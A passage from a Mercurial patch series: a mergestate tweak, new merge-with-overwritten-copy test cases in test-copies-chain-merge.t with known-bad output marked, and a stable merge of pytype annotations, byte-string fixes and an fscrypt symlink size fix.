Differential Revision: https://phab.mercurial-scm.org/D10148 diff --git a/mercurial/mergestate.py b/mercurial/mergestate.py --- a/mercurial/mergestate.py +++ b/mercurial/mergestate.py @@ -382,7 +382,6 @@ if merge_ret is None: # If return value of merge is None, then there are no real conflict del self._state[dfile] - self._stateextras.pop(dfile, None) self._dirty = True elif not merge_ret: self.mark(dfile, MERGE_RECORD_RESOLVED) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1614639922 -3600 # Tue Mar 02 00:05:22 2021 +0100 # Node ID 6b52cffd8d0a266f50935d1a64feddba279d3a9e # Parent 1099ca176ba1914297eb49a06832fac853c3dfa0 test-copies: add a test updating file content while merging a pure overwrite As the current test misbehavior show, this confuse various part of the code: - the committed file is different depending of the commit source, - the upgrade code compute the wrong information on this changeset. This will be fixed in upcoming patches. Differential Revision: https://phab.mercurial-scm.org/D10087 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -891,6 +891,105 @@ o i-0 initial commit: a b h p q r +Subcase: merge overwrite common copy information, but with extra change during the merge +```````````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (d) with a rename (from h to i to d) +- the merge update f content + + $ case_desc="merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d)" + + $ hg up 'desc("f-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved +#if no-changeset + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * d8252ab2e760 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 
000000000000 000000000000 + 3 * 17ec97e60577 d8252ab2e760 000000000000 + 4 * 06dabf50734c b004912a8510 17ec97e60577 + 5 * 19c0e3924691 17ec97e60577 b004912a8510 + 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577 + 7 * d55cb4e9ef57 000000000000 000000000000 +#else + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 5cce88bf349f ae258f702dfe 000000000000 + 3 * cc269dd788c8 b004912a8510 5cce88bf349f + 4 * 51c91a115080 5cce88bf349f b004912a8510 +#endif + $ hg up 'desc("b-1")' + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("f-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ echo "extra-change to (formelly h) during the merge" > d + $ hg ci -m "mBF-change-m-0 $case_desc - one way" + created new head + $ hg manifest --rev . --debug | grep " d" + 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset !) + cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !) + + $ hg up 'desc("f-2")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ echo "extra-change to (formelly h) during the merge" > d + $ hg ci -m "mFB-change-m-0 $case_desc - the other way" + created new head + $ hg manifest --rev . --debug | grep " d" + 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset missing-correct-output !) + 646ed7992dec41eb29635ab28268e7867d0e59a0 644 d (no-changeset known-bad-output !) + cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !) 
+#if no-changeset + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * d8252ab2e760 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 + 3 * 17ec97e60577 d8252ab2e760 000000000000 + 4 * 06dabf50734c b004912a8510 17ec97e60577 + 5 * 19c0e3924691 17ec97e60577 b004912a8510 + 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577 + 7 * d55cb4e9ef57 000000000000 000000000000 + 8 * 1c334238bd42 7b79e2fe0c89 000000000000 + 9 * 646ed7992dec 7b79e2fe0c89 d8252ab2e760 (known-bad-output !) +#else + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 5cce88bf349f ae258f702dfe 000000000000 + 3 * cc269dd788c8 b004912a8510 5cce88bf349f + 4 * 51c91a115080 5cce88bf349f b004912a8510 + 5 * cea2d99c0fde ae258f702dfe 000000000000 +#endif + $ hg log -G --rev '::(desc("mBF-change-m")+desc("mFB-change-m"))' + @ mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + |\ + +---o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + | |/ + | o f-2: rename i -> d + | | + | o f-1: rename h -> i + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + Decision from previous merge are properly chained with later merge ------------------------------------------------------------------ @@ -907,7 +1006,7 @@ (extra unrelated changes) $ hg up 'desc("a-2")' - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ echo j > unrelated-j $ hg add unrelated-j $ hg ci -m 'j-1: unrelated changes (based on the "a" series of changes)' @@ -1396,6 +1495,7 @@ mBCm-0 simple merge - C side: delete a file with copies history , 
B side: unrelated update - one way mBCm-1 re-add d mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way + mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) @@ -1410,6 +1510,7 @@ mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way mFG,Om: chained merges (copy-overwrite -> simple) - same content mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way @@ -1800,6 +1901,26 @@ entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' merged : f, ; + ##### revision "mBF-change-m-0 merge with extra change - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) + touched : d, ; (no-upgraded no-upgraded-parallel !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded missing-correct-output !) + touched : d, ; (upgraded missing-correct-output !) 
+ '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) + merged : d, ; (upgraded known-bad-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel missing-correct-output !) + touched : d, ; (upgraded-parallel missing-correct-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) + merged : d, ; (upgraded-parallel known-bad-output !) + ##### revision "mFB-change-m-0 merge with extra change - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (known-bad-output !) + merged : d, ; (known-bad-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (missing-correct-output !) + touched : d, ; (missing-correct-output !) ##### revision "j-1" ##### 1 sidedata entries entry-0014 size 24 @@ -3193,6 +3314,131 @@ R p +Subcase: merge overwrite common copy information, but with extra change during the merge +``````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (d) with a rename (from h to i to d) + + $ hg log -G --rev '::(desc("mBF-change-m")+desc("mFB-change-m"))' + o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + |\ + +---o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + | |/ + | o f-2: rename i -> d + | | + | o f-1: rename h -> i + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBF-change-m-0")' + M b + A d + h (filelog !) + h (sidedata !) + a (upgraded known-bad-output !) + h (upgraded missing-correct-output !) + a (upgraded-parallel known-bad-output !) 
+ h (upgraded-parallel missing-correct-output !) + h (changeset !) + h (compatibility !) + A t + p + R a + R h + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFB-change-m-0")' + M b + A d + h (filelog missing-correct-output !) + a (filelog known-bad-output !) + h (sidedata !) + h (upgraded !) + h (upgraded-parallel !) + h (changeset !) + h (compatibility !) + A t + p + R a + R h + R p + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBF-change-m-0")' + M d + h (no-filelog !) + R h + $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mBF-change-m-0")' + M b + M d + $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mBF-change-m-0")' + M b + M d + i (no-filelog !) + R i + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mFB-change-m-0")' + M d + h (no-filelog !) + R h + $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFB-change-m-0")' + M b + M d + $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mFB-change-m-0")' + M b + M d + i (no-filelog !) + R i + +#if no-changeset + $ hg log -Gfr 'desc("mBF-change-m-0")' d + o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + |\ + o : f-2: rename i -> d + | : + o : f-1: rename h -> i + :/ + o i-0 initial commit: a b h p q r + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mBF-change-m-0")' d + o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + : + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + +#if no-changeset + $ hg log -Gfr 'desc("mFB-change-m-0")' d + o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + |\ + o : f-2: rename i -> d + | : + o : f-1: rename h -> i + :/ + o i-2: c -move-> d, s -move-> t (known-bad-output !) + | (known-bad-output !) 
+ o i-1: a -move-> c, p -move-> s (known-bad-output !) + | (known-bad-output !) + o i-0 initial commit: a b h p q r + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mFB-change-m-0")' d + o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + : + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + + Decision from previous merge are properly chained with later merge ------------------------------------------------------------------ # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616106299 14400 # Thu Mar 18 18:24:59 2021 -0400 # Node ID e2f7b2695ba153eb7c03b93e3d6a70ac0c82fb59 # Parent 6b52cffd8d0a266f50935d1a64feddba279d3a9e # Parent 86b47ec1960abd22143665bcd84f5d28390f70aa merge with stable diff --git a/mercurial/branchmap.py b/mercurial/branchmap.py --- a/mercurial/branchmap.py +++ b/mercurial/branchmap.py @@ -39,6 +39,7 @@ Tuple, Union, ) + from . import localrepo assert any( ( @@ -51,6 +52,7 @@ Set, Tuple, Union, + localrepo, ) ) @@ -193,7 +195,7 @@ closednodes=None, hasnode=None, ): - # type: (Union[Dict[bytes, List[bytes]], Iterable[Tuple[bytes, List[bytes]]]], bytes, int, Optional[bytes], Optional[Set[bytes]], Optional[Callable[[bytes], bool]]) -> None + # type: (localrepo.localrepository, Union[Dict[bytes, List[bytes]], Iterable[Tuple[bytes, List[bytes]]]], bytes, int, Optional[bytes], Optional[Set[bytes]], Optional[Callable[[bytes], bool]]) -> None """hasnode is a function which can be used to verify whether changelog has a given node or not. 
If it's not provided, we assume that every node we have exists in changelog""" @@ -303,9 +305,7 @@ msg % ( _branchcachedesc(repo), - pycompat.bytestr( - inst - ), # pytype: disable=wrong-arg-types + stringutil.forcebytestr(inst), ) ) bcache = None diff --git a/mercurial/cffi/bdiff.py b/mercurial/cffi/bdiff.py --- a/mercurial/cffi/bdiff.py +++ b/mercurial/cffi/bdiff.py @@ -10,7 +10,7 @@ import struct from ..pure.bdiff import * -from . import _bdiff +from . import _bdiff # pytype: disable=import-error ffi = _bdiff.ffi lib = _bdiff.lib diff --git a/mercurial/cffi/mpatch.py b/mercurial/cffi/mpatch.py --- a/mercurial/cffi/mpatch.py +++ b/mercurial/cffi/mpatch.py @@ -9,7 +9,7 @@ from ..pure.mpatch import * from ..pure.mpatch import mpatchError # silence pyflakes -from . import _mpatch +from . import _mpatch # pytype: disable=import-error ffi = _mpatch.ffi lib = _mpatch.lib diff --git a/mercurial/cffi/osutil.py b/mercurial/cffi/osutil.py --- a/mercurial/cffi/osutil.py +++ b/mercurial/cffi/osutil.py @@ -15,7 +15,7 @@ from .. import pycompat if pycompat.isdarwin: - from . import _osutil + from . 
import _osutil # pytype: disable=import-error ffi = _osutil.ffi lib = _osutil.lib diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -910,7 +910,7 @@ configtarget = repo.ui.config(b'devel', b'bundle.delta') if configtarget not in (b'', b'p1', b'full'): - msg = _("""config "devel.bundle.delta" as unknown value: %s""") + msg = _(b"""config "devel.bundle.delta" as unknown value: %s""") repo.ui.warn(msg % configtarget) deltamode = repository.CG_DELTAMODE_STD @@ -1311,9 +1311,10 @@ def makelookupmflinknode(tree, nodes): if fastpathlinkrev: assert not tree - return ( - manifests.__getitem__ - ) # pytype: disable=unsupported-operands + + # pytype: disable=unsupported-operands + return manifests.__getitem__ + # pytype: enable=unsupported-operands def lookupmflinknode(x): """Callback for looking up the linknode for manifests. diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -869,7 +869,7 @@ ) msg = ( _( - '''Unresolved merge conflicts: + b'''Unresolved merge conflicts: %s diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1083,7 +1083,7 @@ if rev: if not nodes: raise error.Abort(_(b'empty revision set')) - node = repo[nodes.last()].node() + node = repo[nodes[-1]].node() with hbisect.restore_state(repo, state, node): while changesets: # update state @@ -3452,7 +3452,8 @@ regexp = util.re.compile(pattern, reflags) except re.error as inst: ui.warn( - _(b"grep: invalid match pattern: %s\n") % pycompat.bytestr(inst) + _(b"grep: invalid match pattern: %s\n") + % stringutil.forcebytestr(inst) ) return 1 sep, eol = b':', b'\n' diff --git a/mercurial/commit.py b/mercurial/commit.py --- a/mercurial/commit.py +++ b/mercurial/commit.py @@ -359,19 +359,15 @@ elif fparent1 == nullid: fparent1, fparent2 = fparent2, nullid elif fparent2 != nullid: - # is one parent an ancestor of 
the other? - fparentancestors = flog.commonancestorsheads(fparent1, fparent2) - if fparent1 in fparentancestors: + if ms.active() and ms.extras(fname).get(b'filenode-source') == b'other': fparent1, fparent2 = fparent2, nullid - elif fparent2 in fparentancestors: - fparent2 = nullid - elif not fparentancestors: - # TODO: this whole if-else might be simplified much more - if ( - ms.active() - and ms.extras(fname).get(b'filenode-source') == b'other' - ): + # is one parent an ancestor of the other? + else: + fparentancestors = flog.commonancestorsheads(fparent1, fparent2) + if fparent1 in fparentancestors: fparent1, fparent2 = fparent2, nullid + elif fparent2 in fparentancestors: + fparent2 = nullid force_new_node = False # The file might have been deleted by merge code and user explicitly choose diff --git a/mercurial/context.py b/mercurial/context.py --- a/mercurial/context.py +++ b/mercurial/context.py @@ -993,8 +993,10 @@ # if file data starts with '\1\n', empty metadata block is # prepended, which adds 4 bytes to filelog.size(). return self._filelog.cmp(self._filenode, fctx.data()) - if self.size() == fctx.size(): + if self.size() == fctx.size() or self.flags() == b'l': # size() matches: need to compare content + # issue6456: Always compare symlinks because size can represent + # encrypted string for EXT-4 encryption(fscrypt). return self._filelog.cmp(self._filenode, fctx.data()) # size() differs diff --git a/mercurial/crecord.py b/mercurial/crecord.py --- a/mercurial/crecord.py +++ b/mercurial/crecord.py @@ -34,14 +34,14 @@ # patch comments based on the git one diffhelptext = _( - """# To remove '-' lines, make them ' ' lines (context). + b"""# To remove '-' lines, make them ' ' lines (context). # To remove '+' lines, delete them. # Lines starting with # will be removed from the patch. """ ) hunkhelptext = _( - """# + b"""# # If the patch applies cleanly, the edited hunk will immediately be # added to the record list. 
If it does not apply cleanly, a rejects file # will be generated. You can use that when you try again. If all lines @@ -51,7 +51,7 @@ ) patchhelptext = _( - """# + b"""# # If the patch applies cleanly, the edited patch will immediately # be finalised. If it does not apply cleanly, rejects files will be # generated. You can use those when you try again. @@ -64,7 +64,7 @@ curses.error except (ImportError, AttributeError): - curses = False + curses = None class fallbackerror(error.Abort): @@ -611,7 +611,8 @@ chunkselector.stdscr = dummystdscr() if testfn and os.path.exists(testfn): - testf = open(testfn, 'r') + testf = open(testfn, b'r') + # TODO: open in binary mode? testcommands = [x.rstrip('\n') for x in testf.readlines()] testf.close() while True: @@ -1151,7 +1152,7 @@ numtrailingspaces = origlen - strippedlen if towin: - window.addstr(text, colorpair) + window.addstr(encoding.strfromlocal(text), colorpair) t += text if showwhtspc: @@ -1621,7 +1622,7 @@ def helpwindow(self): """print a help window to the screen. exit after any keypress.""" helptext = _( - """ [press any key to return to the patch-display] + b""" [press any key to return to the patch-display] The curses hunk selector allows you to interactively choose among the changes you have made, and confirm only those changes you select for @@ -1745,7 +1746,7 @@ """ask for 'y' to be pressed to confirm selected. return True if confirmed.""" confirmtext = _( - """If you answer yes to the following, your currently chosen patch chunks + b"""If you answer yes to the following, your currently chosen patch chunks will be loaded into an editor. To modify the patch, make the changes in your editor and save. To accept the current patch as-is, close the editor without saving. 
diff --git a/mercurial/dagparser.py b/mercurial/dagparser.py --- a/mercurial/dagparser.py +++ b/mercurial/dagparser.py @@ -168,9 +168,9 @@ if not desc: return - wordchars = pycompat.bytestr( - string.ascii_letters + string.digits - ) # pytype: disable=wrong-arg-types + # pytype: disable=wrong-arg-types + wordchars = pycompat.bytestr(string.ascii_letters + string.digits) + # pytype: enable=wrong-arg-types labels = {} p1 = -1 @@ -179,9 +179,9 @@ def resolve(ref): if not ref: return p1 - elif ref[0] in pycompat.bytestr( - string.digits - ): # pytype: disable=wrong-arg-types + # pytype: disable=wrong-arg-types + elif ref[0] in pycompat.bytestr(string.digits): + # pytype: enable=wrong-arg-types return r - int(ref) else: return labels[ref] @@ -215,9 +215,9 @@ c = nextch() while c != b'\0': - while c in pycompat.bytestr( - string.whitespace - ): # pytype: disable=wrong-arg-types + # pytype: disable=wrong-arg-types + while c in pycompat.bytestr(string.whitespace): + # pytype: enable=wrong-arg-types c = nextch() if c == b'.': yield b'n', (r, [p1]) @@ -225,9 +225,9 @@ r += 1 c = nextch() elif c == b'+': - c, digs = nextrun( - nextch(), pycompat.bytestr(string.digits) - ) # pytype: disable=wrong-arg-types + # pytype: disable=wrong-arg-types + c, digs = nextrun(nextch(), pycompat.bytestr(string.digits)) + # pytype: enable=wrong-arg-types n = int(digs) for i in pycompat.xrange(0, n): yield b'n', (r, [p1]) diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1702,7 +1702,7 @@ ) try: - from . import rustext + from . 
import rustext # pytype: disable=import-error rustext.__doc__ # trigger lazy import except ImportError: @@ -2121,7 +2121,9 @@ try: manifest = m[store.lookup(n)] except error.LookupError as e: - raise error.Abort(e, hint=b"Check your manifest node id") + raise error.Abort( + bytes(e), hint=b"Check your manifest node id" + ) manifest.read() # stores revisision in cache too return @@ -2456,7 +2458,7 @@ tr.close() except ValueError as exc: raise error.Abort( - _(b'bad obsmarker input: %s') % pycompat.bytestr(exc) + _(b'bad obsmarker input: %s') % stringutil.forcebytestr(exc) ) finally: tr.release() diff --git a/mercurial/dirstate.py b/mercurial/dirstate.py --- a/mercurial/dirstate.py +++ b/mercurial/dirstate.py @@ -1284,7 +1284,12 @@ or size == -2 # other parent or fn in copymap ): - madd(fn) + if stat.S_ISLNK(st.st_mode) and size != st.st_size: + # issue6456: Size returned may be longer due to + # encryption on EXT-4 fscrypt, undecided. + ladd(fn) + else: + madd(fn) elif ( time != st[stat.ST_MTIME] and time != st[stat.ST_MTIME] & _rangemask diff --git a/mercurial/dispatch.py b/mercurial/dispatch.py --- a/mercurial/dispatch.py +++ b/mercurial/dispatch.py @@ -173,7 +173,9 @@ "line_buffering": sys.stdout.line_buffering, } if util.safehasattr(sys.stdout, "write_through"): + # pytype: disable=attribute-error kwargs["write_through"] = sys.stdout.write_through + # pytype: enable=attribute-error sys.stdout = io.TextIOWrapper( sys.stdout.buffer, sys.stdout.encoding, @@ -187,7 +189,9 @@ "line_buffering": sys.stderr.line_buffering, } if util.safehasattr(sys.stderr, "write_through"): + # pytype: disable=attribute-error kwargs["write_through"] = sys.stderr.write_through + # pytype: enable=attribute-error sys.stderr = io.TextIOWrapper( sys.stderr.buffer, sys.stderr.encoding, diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -18,6 +18,11 @@ # Do not import anything but pycompat here, please from . 
import pycompat +if pycompat.TYPE_CHECKING: + from typing import ( + Optional, + ) + def _tobytes(exc): """Byte-stringify exception in the same way as BaseException_str()""" @@ -170,6 +175,7 @@ """Raised if a command needs to print an error and exit.""" def __init__(self, message, hint=None): + # type: (bytes, Optional[bytes]) -> None self.message = message self.hint = hint # Pass the message into the Exception constructor to help extensions diff --git a/mercurial/extensions.py b/mercurial/extensions.py --- a/mercurial/extensions.py +++ b/mercurial/extensions.py @@ -912,6 +912,7 @@ exts = {} for ename, ext in extensions(): doc = gettext(ext.__doc__) or _(b'(no help text available)') + assert doc is not None # help pytype if shortname: ename = ename.split(b'.')[-1] exts[ename] = doc.splitlines()[0].strip() diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -41,7 +41,6 @@ mergestate as mergestatemod, narrowspec, phases, - pycompat, requirements, scmutil, sshpeer, @@ -53,7 +52,11 @@ verify as verifymod, vfs as vfsmod, ) -from .utils import hashutil +from .utils import ( + hashutil, + stringutil, +) + release = lock.release @@ -74,7 +77,7 @@ # Python 2 raises TypeError, Python 3 ValueError. except (TypeError, ValueError) as e: raise error.Abort( - _(b'invalid path %s: %s') % (path, pycompat.bytestr(e)) + _(b'invalid path %s: %s') % (path, stringutil.forcebytestr(e)) ) except OSError: isfile = False diff --git a/mercurial/hgweb/webcommands.py b/mercurial/hgweb/webcommands.py --- a/mercurial/hgweb/webcommands.py +++ b/mercurial/hgweb/webcommands.py @@ -1156,6 +1156,7 @@ linerange = None if lrange is not None: + assert lrange is not None # help pytype (!?) 
linerange = webutil.formatlinerange(*lrange) # deactivate numeric nav links when linerange is specified as this # would required a dedicated "revnav" class diff --git a/mercurial/hgweb/wsgicgi.py b/mercurial/hgweb/wsgicgi.py --- a/mercurial/hgweb/wsgicgi.py +++ b/mercurial/hgweb/wsgicgi.py @@ -25,7 +25,7 @@ procutil.setbinary(procutil.stdout) environ = dict(pycompat.iteritems(os.environ)) # re-exports - environ.setdefault('PATH_INFO', b'') + environ.setdefault('PATH_INFO', '') if environ.get('SERVER_SOFTWARE', '').startswith('Microsoft-IIS'): # IIS includes script_name in PATH_INFO scriptname = environ['SCRIPT_NAME'] diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -2336,6 +2336,7 @@ def tracktags(tr2): repo = reporef() + assert repo is not None # help pytype oldfnodes = tagsmod.fnoderevs(repo.ui, repo, oldheads) newheads = repo.changelog.headrevs() newfnodes = tagsmod.fnoderevs(repo.ui, repo, newheads) @@ -2372,6 +2373,7 @@ # gating. 
tracktags(tr2) repo = reporef() + assert repo is not None # help pytype singleheadopt = (b'experimental', b'single-head-per-branch') singlehead = repo.ui.configbool(*singleheadopt) @@ -2475,6 +2477,8 @@ def hookfunc(unused_success): repo = reporef() + assert repo is not None # help pytype + if hook.hashook(repo.ui, b'txnclose-bookmark'): bmchanges = sorted(tr.changes[b'bookmarks'].items()) for name, (old, new) in bmchanges: @@ -2506,7 +2510,9 @@ b'txnclose', throw=False, **pycompat.strkwargs(hookargs) ) - reporef()._afterlock(hookfunc) + repo = reporef() + assert repo is not None # help pytype + repo._afterlock(hookfunc) tr.addfinalize(b'txnclose-hook', txnclosehook) # Include a leading "-" to make it happen before the transaction summary @@ -2517,7 +2523,9 @@ def txnaborthook(tr2): """To be run if transaction is aborted""" - reporef().hook( + repo = reporef() + assert repo is not None # help pytype + repo.hook( b'txnabort', throw=False, **pycompat.strkwargs(tr2.hookargs) ) @@ -2700,6 +2708,7 @@ def updater(tr): repo = reporef() + assert repo is not None # help pytype repo.updatecaches(tr) return updater @@ -2915,7 +2924,7 @@ If both 'lock' and 'wlock' must be acquired, ensure you always acquires 'wlock' first to avoid a dead-lock hazard.""" - l = self._wlockref and self._wlockref() + l = self._wlockref() if self._wlockref else None if l is not None and l.held: l.lock() return l diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -52,6 +52,7 @@ Dict, List, Optional, + Sequence, Tuple, ) @@ -754,7 +755,7 @@ def parseopts(ui, pats, opts): - # type: (Any, List[bytes], Dict[bytes, Any]) -> walkopts + # type: (Any, Sequence[bytes], Dict[bytes, Any]) -> walkopts """Parse log command options into walkopts The returned walkopts will be passed in to getrevs() or makewalker(). 
diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -165,7 +165,7 @@ try: s.login(username, password) except smtplib.SMTPException as inst: - raise error.Abort(inst) + raise error.Abort(stringutil.forcebytestr(inst)) def send(sender, recipients, msg): try: diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -20,6 +20,7 @@ nullrev, ) from .thirdparty import attr +from .utils import stringutil from . import ( copies, encoding, @@ -1343,7 +1344,7 @@ except OSError as inst: repo.ui.warn( _(b"update failed to remove %s: %s!\n") - % (f, pycompat.bytestr(inst.strerror)) + % (f, stringutil.forcebytestr(inst.strerror)) ) if i == 100: yield i, f diff --git a/mercurial/obsutil.py b/mercurial/obsutil.py --- a/mercurial/obsutil.py +++ b/mercurial/obsutil.py @@ -782,7 +782,7 @@ # closestsuccessors returns an empty list for pruned revisions, remap it # into a list containing an empty list for future processing if ssets == []: - ssets = [[]] + ssets = [_succs()] # Try to recover pruned markers succsmap = repo.obsstore.successors diff --git a/mercurial/patch.py b/mercurial/patch.py --- a/mercurial/patch.py +++ b/mercurial/patch.py @@ -1210,7 +1210,7 @@ # Patch comment based on the Git one (based on comment at end of # https://mercurial-scm.org/wiki/RecordExtension) phelp = b'---' + _( - """ + b""" To remove '-' lines, make them ' ' lines (context). To remove '+' lines, delete them. Lines starting with # will be removed from the patch. 
diff --git a/mercurial/posix.py b/mercurial/posix.py --- a/mercurial/posix.py +++ b/mercurial/posix.py @@ -321,9 +321,10 @@ fullpath = os.path.join(cachedir, target) open(fullpath, b'w').close() except IOError as inst: - if ( - inst[0] == errno.EACCES - ): # pytype: disable=unsupported-operands + # pytype: disable=unsupported-operands + if inst[0] == errno.EACCES: + # pytype: enable=unsupported-operands + # If we can't write to cachedir, just pretend # that the fs is readonly and by association # that the fs won't support symlinks. This diff --git a/mercurial/pure/osutil.py b/mercurial/pure/osutil.py --- a/mercurial/pure/osutil.py +++ b/mercurial/pure/osutil.py @@ -172,7 +172,7 @@ else: import msvcrt - _kernel32 = ctypes.windll.kernel32 + _kernel32 = ctypes.windll.kernel32 # pytype: disable=module-attr _DWORD = ctypes.c_ulong _LPCSTR = _LPSTR = ctypes.c_char_p @@ -216,7 +216,7 @@ _kernel32.CreateFileA.restype = _HANDLE def _raiseioerror(name): - err = ctypes.WinError() + err = ctypes.WinError() # pytype: disable=module-attr raise IOError( err.errno, '%s: %s' % (encoding.strfromlocal(name), err.strerror) ) @@ -271,7 +271,7 @@ if fh == _INVALID_HANDLE_VALUE: _raiseioerror(name) - fd = msvcrt.open_osfhandle(fh, flags) + fd = msvcrt.open_osfhandle(fh, flags) # pytype: disable=module-attr if fd == -1: _kernel32.CloseHandle(fh) _raiseioerror(name) diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -570,7 +570,7 @@ def parse_data(data): """parse parse nodemap data into a nodemap 